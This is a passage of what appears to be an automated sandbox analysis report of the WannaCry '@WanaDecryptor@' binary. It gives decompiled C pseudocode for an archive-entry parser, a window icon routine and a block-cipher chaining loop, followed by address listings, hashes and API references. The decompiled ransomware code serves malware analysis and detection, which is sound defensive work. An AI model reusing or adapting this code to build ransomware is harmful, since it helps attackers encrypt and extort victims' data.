												_t164 = _t162 >> 0x0000001e & 0x00000001;
												_t264 =  !(_t297 >> 0x17) & 0x00000001;
												_t340 =  *(_t355 + 0x3c) >> 8;
												__eflags = _t340;
												 *(_t355 + 0x12) = 0;
												_t234 = 1;
												if(_t340 == 0) {
													L39:
													_t264 = _t297 & 0x00000001;
													 *(_t355 + 0x13) = _t297 >> 0x00000001 & 0x00000001;
													 *(_t355 + 0x12) = _t297 >> 0x00000002 & 0x00000001;
													_t164 = _t297 >> 0x00000004 & 0x00000001;
													_t299 = _t297 >> 0x00000005 & 0x00000001;
													__eflags = _t299;
													_t234 = _t299;
												} else {
													__eflags = _t340 - 7;
													if(_t340 == 7) {
														goto L39;
													} else {
														__eflags = _t340 - 0xb;
														if(_t340 == 0xb) {
															goto L39;
														} else {
															__eflags = _t340 - 0xe;
															if(_t340 == 0xe) {
																goto L39;
															}
														}
													}
												}
												_t341 = 0;
												__eflags = _t164;
												 *(_t346 + 0x108) = 0;
												if(_t164 != 0) {
													 *(_t346 + 0x108) = 0x10;
												}
												__eflags = _t234;
												if(_t234 != 0) {
													_t219 =  *(_t346 + 0x108) | 0x00000020;
													__eflags = _t219;
													 *(_t346 + 0x108) = _t219;
												}
												__eflags =  *(_t355 + 0x13);
												if( *(_t355 + 0x13) != 0) {
													_t217 =  *(_t346 + 0x108) | 0x00000002;
													__eflags = _t217;
													 *(_t346 + 0x108) = _t217;
												}
												__eflags = _t264;
												if(_t264 != 0) {
													_t215 =  *(_t346 + 0x108) | 0x00000001;
													__eflags = _t215;
													 *(_t346 + 0x108) = _t215;
												}
												__eflags =  *(_t355 + 0x12);
												if( *(_t355 + 0x12) != 0) {
													_t63 = _t346 + 0x108;
													 *_t63 =  *(_t346 + 0x108) | 0x00000004;
													__eflags =  *_t63;
												}
												_t300 =  *((intOrPtr*)(_t355 + 0x58));
												 *((intOrPtr*)(_t346 + 0x124)) =  *((intOrPtr*)(_t355 + 0x54));
												 *((intOrPtr*)(_t346 + 0x128)) = _t300;
												_t177 = E00411B80( *(_t355 + 0x4c) >> 0x10,  *(_t355 + 0x4c));
												_t356 = _t355 + 8;
												 *(_t356 + 0x30) = _t177;
												 *((intOrPtr*)(_t356 + 0x3c)) = _t300;
												LocalFileTimeToFileTime(_t356 + 0x30, _t356 + 0x28);
												_t180 =  *(_t356 + 0x28);
												_t269 =  *((intOrPtr*)(_t356 + 0x2c));
												 *(_t346 + 0x10c) = _t180;
												 *(_t346 + 0x114) = _t180;
												 *(_t346 + 0x11c) = _t180;
												__eflags =  *((intOrPtr*)(_t356 + 0x14)) - 4;
												 *((intOrPtr*)(_t346 + 0x110)) = _t269;
												 *((intOrPtr*)(_t346 + 0x118)) = _t269;
												 *((intOrPtr*)(_t346 + 0x120)) = _t269;
												if( *((intOrPtr*)(_t356 + 0x14)) <= 4) {
													_t329 =  *(_t356 + 0x1c);
												} else {
													_t329 =  *(_t356 + 0x1c);
													 *((char*)(_t356 + 0x1a)) = 0;
													do {
														 *((char*)(_t356 + 0x19)) =  *((intOrPtr*)(_t329 + _t341 + 1));
														 *(_t356 + 0x18) =  *((intOrPtr*)(_t341 + _t329));
														_t273 = "UT";
														_t186 = _t356 + 0x18;
														while(1) {
															_t235 =  *_t186;
															_t303 = _t235;
															__eflags = _t235 -  *_t273;
															if(_t235 !=  *_t273) {
																break;
															}
															__eflags = _t303;
															if(_t303 == 0) {
																L57:
																_t186 = 0;
															} else {
																_t239 =  *((intOrPtr*)(_t186 + 1));
																_t311 = _t239;
																_t92 = _t273 + 1; // 0x2f000054
																__eflags = _t239 -  *_t92;
																if(_t239 !=  *_t92) {
																	break;
																} else {
																	_t186 = _t186 + 2;
																	_t273 = _t273 + 2;
																	__eflags = _t311;
																	if(_t311 != 0) {
																		continue;
																	} else {
																		goto L57;
																	}
																}
															}
															L59:
															__eflags = _t186;
															if(_t186 == 0) {
																_t188 =  *((intOrPtr*)(_t341 + _t329 + 4));
																_t343 = _t341 + 5;
																_t276 = 1;
																__eflags = _t188 & 0x00000001;
																 *((char*)(_t356 + 0x12)) = 1;
																if((_t188 & 0x00000001) != 0) {
																	_t309 =  *((intOrPtr*)(_t343 + _t329));
																	_t343 = _t343 + 4;
																	__eflags = 0 << 8;
																	_t212 = E00411B50(_t309, 0 << 8 << 8);
																	_t276 =  *((intOrPtr*)(_t356 + 0x16));
																	 *(_t346 + 0x11c) = _t212;
																	_t356 = _t356 + 4;
																	 *((intOrPtr*)(_t346 + 0x120)) = 0;
																}
																__eflags = 1;
																if(1 != 0) {
																	_t307 =  *((intOrPtr*)(_t343 + _t329));
																	_t343 = _t343 + 4;
																	__eflags = 0 << 8;
																	_t204 = E00411B50(_t307, 0 << 8 << 8);
																	_t276 =  *((intOrPtr*)(_t356 + 0x16));
																	 *(_t346 + 0x10c) = _t204;
																	_t356 = _t356 + 4;
																	 *((intOrPtr*)(_t346 + 0x110)) = 0;
																}
																__eflags = _t276;
																if(_t276 != 0) {
																	 *(_t346 + 0x114) = E00411B50( *((intOrPtr*)(_t343 + _t329)), 0 << 8 << 8);
																	_t356 = _t356 + 4;
																	 *((intOrPtr*)(_t346 + 0x118)) = 0;
																}
															} else {
																goto L60;
															}
															goto L69;
														}
														asm("sbb eax, eax");
														asm("sbb eax, 0xffffffff");
														goto L59;
														L60:
														_t341 = _t341 + 4;
														__eflags = _t341 + 4 -  *((intOrPtr*)(_t356 + 0x14));
													} while (_t341 + 4 <  *((intOrPtr*)(_t356 + 0x14)));
												}
												L69:
												__eflags = _t329;
												if(_t329 != 0) {
													_push(_t329);
													L00412C98();
													_t356 = _t356 + 4;
												}
												_t182 =  *((intOrPtr*)(_t356 + 0x20));
												memcpy(_t182 + 8, _t346, 0x4b << 2);
												 *((intOrPtr*)(_t182 + 0x134)) =  *((intOrPtr*)(_t356 + 0x2a0));
												__eflags = 0;
												return 0;
												goto L73;
											}
										} else {
											_push(_t313);
											L00412C98();
											return 0x800;
										}
									} else {
										return 0x800;
									}
								} else {
									return 0x700;
								}
							} else {
								goto L8;
							}
						} else {
							if(_t312 == _t232) {
								L8:
								_t226 =  *((intOrPtr*)(_t348 + 0x28c));
								 *_t226 =  *((intOrPtr*)( *_t336 + 4));
								 *((char*)(_t226 + 4)) = 0;
								 *((intOrPtr*)(_t226 + 0x108)) = 0;
								 *((intOrPtr*)(_t226 + 0x10c)) = 0;
								 *((intOrPtr*)(_t226 + 0x110)) = 0;
								 *((intOrPtr*)(_t226 + 0x114)) = 0;
								 *((intOrPtr*)(_t226 + 0x118)) = 0;
								 *((intOrPtr*)(_t226 + 0x11c)) = 0;
								 *((intOrPtr*)(_t226 + 0x120)) = 0;
								 *((intOrPtr*)(_t226 + 0x124)) = 0;
								 *((intOrPtr*)(_t226 + 0x128)) = 0;
								__eflags = 0;
								return 0;
							} else {
								return memcpy( *(_t348 + 0x298), _t336 + 8, 0x4b << 2);
							}
						}
					}
				}
				L73:
			}





























































                                  0x00411cf9
                                  0x00411d00
                                  0x00411d03
                                  0x00411d07
                                  0x00411d0b
                                  0x00412233
                                  0x0041223f
                                  0x00411d11
                                  0x00411d11
                                  0x00411d16
                                  0x00000000
                                  0x00411d1c
                                  0x00411d1f
                                  0x00411d22
                                  0x00411d27
                                  0x00411d27
                                  0x00411d30
                                  0x00411d35
                                  0x00411d5a
                                  0x00411d5c
                                  0x00411db5
                                  0x00411db7
                                  0x00411dba
                                  0x00411dbd
                                  0x00411dc2
                                  0x00411dc2
                                  0x00411dc5
                                  0x00411dc7
                                  0x00411dca
                                  0x00411dcd
                                  0x00411dd2
                                  0x00411dd4
                                  0x00411dd7
                                  0x00411dd7
                                  0x00411df9
                                  0x00411e10
                                  0x00411e15
                                  0x00411e18
                                  0x00411e1a
                                  0x00411e39
                                  0x00411e3e
                                  0x00411e41
                                  0x00411e43
                                  0x00411e56
                                  0x00411e5a
                                  0x00411e5b
                                  0x00411e62
                                  0x00411e68
                                  0x00411e73
                                  0x00411e7c
                                  0x00411e7f
                                  0x00411e81
                                  0x00411eae
                                  0x00411eb7
                                  0x00411eb9
                                  0x00411ebd
                                  0x00411ec9
                                  0x00411ecd
                                  0x00411ed4
                                  0x00411ed4
                                  0x00411ed7
                                  0x00411ed7
                                  0x00411ed9
                                  0x00411ee0
                                  0x00411ee0
                                  0x00411ee2
                                  0x00411ee4
                                  0x00000000
                                  0x00000000
                                  0x00411ee6
                                  0x00411ee6
                                  0x00411ee9
                                  0x00411eeb
                                  0x00411ee0
                                  0x00411ee0
                                  0x00411ee2
                                  0x00411ee4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00411ee4
                                  0x00411ee0
                                  0x00411ef0
                                  0x00411ef0
                                  0x00411ef2
                                  0x00411ef4
                                  0x00411ee0
                                  0x00411ee0
                                  0x00411ee2
                                  0x00411ee4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00411ee4
                                  0x00411ee0
                                  0x00411ef7
                                  0x00411ef9
                                  0x00411efb
                                  0x00411ee0
                                  0x00411ee0
                                  0x00411ee2
                                  0x00411ee4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00411ee4
                                  0x00411ee0
                                  0x00411efe
                                  0x00411f03
                                  0x00411f04
                                  0x00411f09
                                  0x00411f0c
                                  0x00411f0e
                                  0x00411f10
                                  0x00411f10
                                  0x00411ee0
                                  0x00411ee0
                                  0x00411ee2
                                  0x00411ee4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00411ee4
                                  0x00411ee0
                                  0x00411f15
                                  0x00411f1a
                                  0x00411f1b
                                  0x00411f20
                                  0x00411f23
                                  0x00411f25
                                  0x00411f27
                                  0x00411f27
                                  0x00411ee0
                                  0x00411ee0
                                  0x00411ee2
                                  0x00411ee4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00411ee4
                                  0x00411ee0
                                  0x00411f2c
                                  0x00411f31
                                  0x00411f32
                                  0x00411f37
                                  0x00411f3a
                                  0x00411f3c
                                  0x00411f3e
                                  0x00411f3e
                                  0x00411ee0
                                  0x00411ee0
                                  0x00411ee2
                                  0x00411ee4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00411ee4
                                  0x00000000
                                  0x00411ee0
                                  0x00411f43
                                  0x00411f48
                                  0x00411f49
                                  0x00411f4e
                                  0x00411f51
                                  0x00411f53
                                  0x00411f55
                                  0x00411f55
                                  0x00000000
                                  0x00411f55
                                  0x00411f5f
                                  0x00411f6a
                                  0x00411f6e
                                  0x00411f75
                                  0x00411f75
                                  0x00411f7e
                                  0x00411f83
                                  0x00411f83
                                  0x00411f93
                                  0x00411f95
                                  0x00411f98
                                  0x00411f98
                                  0x00411f9b
                                  0x00411fa0
                                  0x00411fa2
                                  0x00411fb3
                                  0x00411fbb
                                  0x00411fbe
                                  0x00411fc9
                                  0x00411fd5
                                  0x00411fd7
                                  0x00411fd7
                                  0x00411fda
                                  0x00411fa4
                                  0x00411fa4
                                  0x00411fa7
                                  0x00000000
                                  0x00411fa9
                                  0x00411fa9
                                  0x00411fac
                                  0x00000000
                                  0x00411fae
                                  0x00411fae
                                  0x00411fb1
                                  0x00000000
                                  0x00000000
                                  0x00411fb1
                                  0x00411fac
                                  0x00411fa7
                                  0x00411fdc
                                  0x00411fde
                                  0x00411fe0
                                  0x00411fe6
                                  0x00411fe8
                                  0x00411fe8
                                  0x00411ff2
                                  0x00411ff4
                                  0x00411ffc
                                  0x00411ffc
                                  0x00411ffe
                                  0x00411ffe
                                  0x00412008
                                  0x0041200a
                                  0x00412012
                                  0x00412012
                                  0x00412014
                                  0x00412014
                                  0x0041201a
                                  0x0041201c
                                  0x00412024
                                  0x00412024
                                  0x00412026
                                  0x00412026
                                  0x00412035
                                  0x00412037
                                  0x00412039
                                  0x00412039
                                  0x00412039
                                  0x00412039
                                  0x00412043
                                  0x00412047
                                  0x00412058
                                  0x0041205e
                                  0x00412063
                                  0x00412066
                                  0x00412074
                                  0x00412078
                                  0x0041207e
                                  0x00412082
                                  0x00412086
                                  0x0041208c
                                  0x00412092
                                  0x0041209c
                                  0x0041209e
                                  0x004120a4
                                  0x004120aa
                                  0x004120b0
                                  0x004121f2
                                  0x004120b6
                                  0x004120b6
                                  0x004120ba
                                  0x004120bf
                                  0x004120c6
                                  0x004120ca
                                  0x004120ce
                                  0x004120d3
                                  0x004120d7
                                  0x004120d7
                                  0x004120d9
                                  0x004120db
                                  0x004120dd
                                  0x00000000
                                  0x00000000
                                  0x004120df
                                  0x004120e1
                                  0x004120f7
                                  0x004120f7
                                  0x004120e3
                                  0x004120e3
                                  0x004120e6
                                  0x004120e8
                                  0x004120e8
                                  0x004120eb
                                  0x00000000
                                  0x004120ed
                                  0x004120ed
                                  0x004120f0
                                  0x004120f3
                                  0x004120f5
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004120f5
                                  0x004120eb
                                  0x00412100
                                  0x00412100
                                  0x00412102
                                  0x00412120
                                  0x00412124
                                  0x00412133
                                  0x00412136
                                  0x00412138
                                  0x0041213c
                                  0x00412150
                                  0x00412153
                                  0x0041215e
                                  0x00412161
                                  0x00412166
                                  0x0041216a
                                  0x00412170
                                  0x00412173
                                  0x00412173
                                  0x00412179
                                  0x0041217b
                                  0x0041218f
                                  0x00412192
                                  0x0041219d
                                  0x004121a0
                                  0x004121a5
                                  0x004121a9
                                  0x004121af
                                  0x004121b2
                                  0x004121b2
                                  0x004121b8
                                  0x004121ba
                                  0x004121e1
                                  0x004121e7
                                  0x004121ea
                                  0x004121ea
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00412102
                                  0x004120fb
                                  0x004120fd
                                  0x00000000
                                  0x00412104
                                  0x0041210e
                                  0x00412115
                                  0x00412115
                                  0x00412119
                                  0x004121f6
                                  0x004121f6
                                  0x004121f8
                                  0x004121fa
                                  0x004121fb
                                  0x00412200
                                  0x00412200
                                  0x00412203
                                  0x00412214
                                  0x0041221f
                                  0x00412225
                                  0x0041222e
                                  0x00000000
                                  0x0041222e
                                  0x00411e83
                                  0x00411e83
                                  0x00411e84
                                  0x00411e9a
                                  0x00411e9a
                                  0x00411e47
                                  0x00411e53
                                  0x00411e53
                                  0x00411e1e
                                  0x00411e2a
                                  0x00411e2a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00411d37
                                  0x00411d39
                                  0x00411d5e
                                  0x00411d66
                                  0x00411d6d
                                  0x00411d71
                                  0x00411d74
                                  0x00411d7a
                                  0x00411d80
                                  0x00411d86
                                  0x00411d8c
                                  0x00411d92
                                  0x00411d98
                                  0x00411d9e
                                  0x00411da4
                                  0x00411daa
                                  0x00411db2
                                  0x00411d3b
                                  0x00411d57
                                  0x00411d57
                                  0x00411d39
                                  0x00411d35
                                  0x00411d16
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: /../$/..\$\../$\..\
                                  • API String ID: 0-3885502717
                                  • Opcode ID: 640072b25ce39f29e2e0ef118f9821fd9eceea7f93f8cfb82637dd0406826ea6
                                  • Instruction ID: 7e1d0207c54717434a39a3e8c1400c014a600b9e0d7efc558eb6bad2cf7342ef
                                  • Opcode Fuzzy Hash: 640072b25ce39f29e2e0ef118f9821fd9eceea7f93f8cfb82637dd0406826ea6
                                  • Instruction Fuzzy Hash: FAF138756043414FC724CF2888817EBBBE1ABD8304F18892EEDD9CB351D679E989C799
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004067F0 Relevance: 13.6, APIs: 9, Instructions: 71windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E004067F0(void* __ecx) {
				signed int _v84;
				void* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				int _t16;
				int _t21;
				int _t22;
				int _t37;
				struct tagRECT* _t48;
				void* _t56;

				_t56 = __ecx;
				_t16 = IsIconic( *(__ecx + 0x20));
				if(_t16 == 0) {
					L00412CBC();
					return _t16;
				} else {
					_push(_t56);
					L00412DD0();
					asm("sbb eax, eax");
					SendMessageA( *(_t56 + 0x20), 0x27,  ~( &_v88) & _v84, 0);
					_t21 = GetSystemMetrics(0xb);
					_t22 = GetSystemMetrics(0xc);
					_t48 =  &_v104;
					GetClientRect( *(_t56 + 0x20), _t48);
					asm("cdq");
					asm("cdq");
					_t37 = DrawIcon(_v84, _v96 - _v104 - _t21 + 1 - _v104 >> 1, _v92 - _v100 - _t22 + 1 - _t48 >> 1,  *(_t56 + 0x82c));
					L00412DB8();
					return _t37;
				}
			}















                                  0x004067f4
                                  0x004067fa
                                  0x00406802
                                  0x0040689c
                                  0x004068a5
                                  0x00406808
                                  0x0040680a
                                  0x0040680f
                                  0x00406823
                                  0x0040682b
                                  0x00406839
                                  0x0040683f
                                  0x00406846
                                  0x0040684c
                                  0x00406866
                                  0x00406879
                                  0x00406884
                                  0x0040688e
                                  0x00406899
                                  0x00406899

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MetricsSystem$#2379#470#755ClientDrawIconIconicMessageRectSend
                                  • String ID:
                                  • API String ID: 1397574227-0
                                  • Opcode ID: c6b99cd5ac0b71c3c4030717ac5958d372fb1afb6ef73d6220d96d7f8d3b0266
                                  • Instruction ID: db6533e43e067d2e1cb08ff7c7a85c8aaf9a8b82d3d45c58550572c7a5875683
                                  • Opcode Fuzzy Hash: c6b99cd5ac0b71c3c4030717ac5958d372fb1afb6ef73d6220d96d7f8d3b0266
                                  • Instruction Fuzzy Hash: 45117F712146069FC214DF38DD49DEBB7E9FBC8304F488A2DF58AC3290DA74E8058B95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B3C0 Relevance: 12.2, APIs: 8, Instructions: 203COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 65%
                                  			E0040B3C0(void* __ebx, void* __ecx, void* __ebp, void* _a4, signed int _a8, signed int _a12, void* _a16) {
				void* _v4;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				struct HWND__* _v32;
				WCHAR* _v36;
				struct HWND__* _t90;
				signed int* _t100;
				signed int _t102;
				signed int _t105;
				signed int* _t109;
				signed int _t113;
				signed int _t114;
				signed int _t121;
				void* _t124;
				signed int _t130;
				signed int _t132;
				signed int _t138;
				signed int _t143;
				signed int _t152;
				signed int _t157;
				void* _t185;
				void* _t188;
				signed int* _t191;
				void* _t204;
				signed int _t206;
				struct HWND__* _t207;
				void* _t211;
				void* _t212;
				void* _t217;
				void* _t218;
				signed int _t221;
				void* _t224;
				signed int* _t226;
				void* _t227;
				void* _t228;

				_t228 = _t227 - 0xc;
				_t124 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
					_push(0x41c9c0);
					_push( &_v16);
					L004130FC();
				}
				_t206 = _a12;
				_t185 = 0;
				if(_t206 == 0) {
					L26:
					__imp__??0exception@@QAE@ABQBD@Z(0x4213ac);
					_push(0x41c9c0);
					_push( &_v16);
					L004130FC();
					_push(_t206);
					_t90 = FindWindowW(0, _v36); // executed
					_t207 = _t90;
					if(_t207 != 0) {
						_push(_t185);
						ShowWindow(_t207, 5); // executed
						SetWindowPos(_t207, 0xffffffff, 0, 0, 0, 0, 0x43);
						SetWindowPos(_t207, 0xfffffffe, 0, 0, 0, 0, 0x43);
						SetForegroundWindow(_t207); // executed
						SetFocus(_t207);
						SetActiveWindow(_t207);
						BringWindowToTop(_t207);
						_t90 = _v32;
						if(_t90 != 0) {
							ExitProcess(0);
						}
					}
					return _t90;
				} else {
					_t130 =  *(_t124 + 0x3cc);
					if(_t206 % _t130 != 0) {
						goto L26;
					} else {
						_t100 = _a16;
						if(_t100 != 1) {
							L13:
							_a16 = _t185;
							if(_t100 != 2) {
								L23:
								_t102 = _t206 / _t130;
								_t188 = _a4;
								_t221 = _a8;
								if(_t102 <= 0) {
									goto L11;
								} else {
									do {
										_push(_t221);
										_push(_t188);
										E0040B0C0(_t124);
										_t132 =  *(_t124 + 0x3cc);
										_t188 = _t188 + _t132;
										_t221 = _t221 + _t132;
										_a8 = _a8 + 1;
										_t105 = _t206 / _t132;
									} while (_a8 < _t105);
									return _t105;
								}
							} else {
								_t102 = _t206 / _t130;
								_t191 = _a8;
								_t224 = _a4;
								_a4 = _t191;
								if(_t102 <= 0) {
									goto L11;
								} else {
									while(1) {
										_t50 = _t124 + 0x3f0; // 0x444
										_push(_t191);
										E0040ADC0(_t124);
										_t109 = _t191;
										if( *((intOrPtr*)(_t124 + 4)) == 0) {
											break;
										}
										_t211 = 0;
										if( *(_t124 + 0x3cc) > 0) {
											do {
												 *_t109 =  *_t109 ^  *(_t211 + _t224);
												_t109 =  &(_t109[0]);
												_t211 = _t211 + 1;
											} while (_t211 <  *(_t124 + 0x3cc));
										}
										_t212 = _t224;
										_t56 = _t124 + 0x3f0; // 0x444
										_t138 =  *(_t124 + 0x3cc) >> 2;
										_t113 = memcpy(_t212 + _t138 + _t138, _t212, memcpy(_t56, _t212, _t138 << 2) & 0x00000003);
										_t228 = _t228 + 0x18;
										_t143 =  *(_t124 + 0x3cc);
										_t114 = _t113 / _t143;
										_t224 = _t224 + _t143;
										_v4 = _v4 + _t143;
										_t206 = _a8 + 1;
										_a8 = _t206;
										if(_t206 < _t114) {
											_t191 = _v4;
											continue;
										} else {
											return _t114;
										}
										goto L31;
									}
									__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
									_t130 =  &_v24;
									_push(0x41c9c0);
									_push(_t130);
									L004130FC();
									goto L23;
								}
							}
						} else {
							_t102 = _t206 / _t130;
							_t226 = _a8;
							_a16 = 0;
							if(_t102 <= 0) {
								L11:
								return _t102;
							} else {
								while(1) {
									_push(_t226);
									_push(_a4);
									E0040B0C0(_t124);
									_t100 = _t226;
									if( *((intOrPtr*)(_t124 + 4)) == 0) {
										break;
									}
									_t217 = 0;
									if( *(_t124 + 0x3cc) > 0) {
										_t22 = _t124 - _t226 + 0x3f0; // 0x444
										_t204 = _t22;
										do {
											 *_t100 =  *_t100 ^  *(_t204 + _t100);
											_t100 =  &(_t100[0]);
											_t217 = _t217 + 1;
										} while (_t217 <  *(_t124 + 0x3cc));
									}
									_t218 = _v4;
									_t27 = _t124 + 0x3f0; // 0x444
									_t152 =  *(_t124 + 0x3cc) >> 2;
									_t121 = memcpy(_t218 + _t152 + _t152, _t218, memcpy(_t27, _t218, _t152 << 2) & 0x00000003);
									_t228 = _t228 + 0x18;
									_t157 =  *(_t124 + 0x3cc);
									_t102 = _t121 / _t157;
									_t185 = _v4 + _t157;
									_t226 = _t226 + _t157;
									_t206 = _a8 + 1;
									_v4 = _t185;
									_a8 = _t206;
									if(_t206 < _t102) {
										continue;
									} else {
										goto L11;
									}
									goto L31;
								}
								__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
								_t130 =  &_v24;
								_push(0x41c9c0);
								_push(_t130);
								L004130FC();
								goto L13;
							}
						}
					}
				}
				L31:
			}








































                                  0x0040b3c0
                                  0x0040b3c4
                                  0x0040b3ce
                                  0x0040b3d9
                                  0x0040b3e3
                                  0x0040b3e8
                                  0x0040b3e9
                                  0x0040b3e9
                                  0x0040b3ee
                                  0x0040b3f2
                                  0x0040b3f6
                                  0x0040b602
                                  0x0040b60b
                                  0x0040b615
                                  0x0040b61a
                                  0x0040b61b
                                  0x0040b624
                                  0x0040b628
                                  0x0040b62e
                                  0x0040b632
                                  0x0040b634
                                  0x0040b638
                                  0x0040b651
                                  0x0040b660
                                  0x0040b663
                                  0x0040b66a
                                  0x0040b671
                                  0x0040b678
                                  0x0040b67e
                                  0x0040b685
                                  0x0040b689
                                  0x0040b689
                                  0x0040b685
                                  0x0040b690
                                  0x0040b3fc
                                  0x0040b3fc
                                  0x0040b40a
                                  0x00000000
                                  0x0040b410
                                  0x0040b410
                                  0x0040b417
                                  0x0040b4ed
                                  0x0040b4f0
                                  0x0040b4f4
                                  0x0040b5ba
                                  0x0040b5be
                                  0x0040b5c0
                                  0x0040b5c4
                                  0x0040b5ca
                                  0x00000000
                                  0x0040b5d0
                                  0x0040b5d0
                                  0x0040b5d0
                                  0x0040b5d1
                                  0x0040b5d4
                                  0x0040b5d9
                                  0x0040b5e3
                                  0x0040b5e5
                                  0x0040b5ea
                                  0x0040b5f0
                                  0x0040b5f2
                                  0x0040b5ff
                                  0x0040b5ff
                                  0x0040b4fa
                                  0x0040b4fe
                                  0x0040b500
                                  0x0040b504
                                  0x0040b508
                                  0x0040b50e
                                  0x00000000
                                  0x0040b510
                                  0x0040b516
                                  0x0040b516
                                  0x0040b51c
                                  0x0040b520
                                  0x0040b528
                                  0x0040b52c
                                  0x00000000
                                  0x00000000
                                  0x0040b534
                                  0x0040b538
                                  0x0040b53a
                                  0x0040b541
                                  0x0040b549
                                  0x0040b54a
                                  0x0040b54b
                                  0x0040b53a
                                  0x0040b555
                                  0x0040b559
                                  0x0040b55f
                                  0x0040b56f
                                  0x0040b56f
                                  0x0040b571
                                  0x0040b57b
                                  0x0040b57f
                                  0x0040b581
                                  0x0040b589
                                  0x0040b58a
                                  0x0040b590
                                  0x0040b512
                                  0x00000000
                                  0x0040b592
                                  0x0040b599
                                  0x0040b599
                                  0x00000000
                                  0x0040b590
                                  0x0040b5a5
                                  0x0040b5ab
                                  0x0040b5af
                                  0x0040b5b4
                                  0x0040b5b5
                                  0x00000000
                                  0x0040b5b5
                                  0x0040b50e
                                  0x0040b41d
                                  0x0040b429
                                  0x0040b42b
                                  0x0040b42f
                                  0x0040b435
                                  0x0040b4c5
                                  0x0040b4cc
                                  0x0040b43b
                                  0x0040b43b
                                  0x0040b43f
                                  0x0040b440
                                  0x0040b443
                                  0x0040b44b
                                  0x0040b44f
                                  0x00000000
                                  0x00000000
                                  0x0040b457
                                  0x0040b45b
                                  0x0040b461
                                  0x0040b461
                                  0x0040b467
                                  0x0040b46e
                                  0x0040b476
                                  0x0040b477
                                  0x0040b478
                                  0x0040b467
                                  0x0040b482
                                  0x0040b488
                                  0x0040b48e
                                  0x0040b49e
                                  0x0040b49e
                                  0x0040b4a0
                                  0x0040b4aa
                                  0x0040b4b0
                                  0x0040b4b2
                                  0x0040b4b4
                                  0x0040b4b5
                                  0x0040b4b9
                                  0x0040b4bf
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040b4bf
                                  0x0040b4d8
                                  0x0040b4de
                                  0x0040b4e2
                                  0x0040b4e7
                                  0x0040b4e8
                                  0x00000000
                                  0x0040b4e8
                                  0x0040b435
                                  0x0040b417
                                  0x0040b40a
                                  0x00000000

                                  APIs
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B3D9
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B3E9
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B4D8
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B4E8
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B5A5
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B5B5
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213AC), ref: 0040B60B
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B61B
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
